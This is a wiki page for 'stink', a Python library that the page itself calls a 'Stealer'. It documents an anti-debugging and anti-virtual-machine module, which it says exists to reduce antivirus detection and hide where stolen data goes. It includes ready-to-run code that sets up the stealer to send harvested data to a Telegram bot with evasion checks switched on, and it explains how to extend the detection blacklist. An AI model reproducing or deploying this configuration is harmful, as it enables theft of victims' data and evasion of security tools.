Skip to content

Anti‐debugging and anti‐virtual‐machine

Jump to bottom
Astaroth edited this page Nov 1, 2023 · 8 revisions

Introduction

In stink there is a module to check PC to virtual machine and if there are any running debug applications before starting. If they are detected, stink terminates its work. This will help to get fewer detections from antiviruses, as well as hide where the data goes.

Customization

  1. By default, all checks are disabled. You can specify certain ones if necessary:
from stink import Stealer, Senders, Protectors

if __name__ == '__main__':
    Stealer(
        senders=[
            Senders.telegram(token="YOUR_TOKEN", user_id=YOUR_ID)
        ],
        protectors=[
            Protectors.processes,
            Protectors.virtual_machine
        ]
    ).run()
  1. You can also enable all checks:
from stink import Stealer, Senders, Protectors

if __name__ == '__main__':
    Stealer(
        senders=[
            Senders.telegram(token="YOUR_TOKEN", user_id=YOUR_ID)
        ],
        protectors=[
            Protectors.all
        ]
    ).run()
  1. You can add additional usernames, MAC addresses, etc. to the blacklist in the ProtectorConfig class in the file stink/helpers/config.py:

image

Clone this wiki locally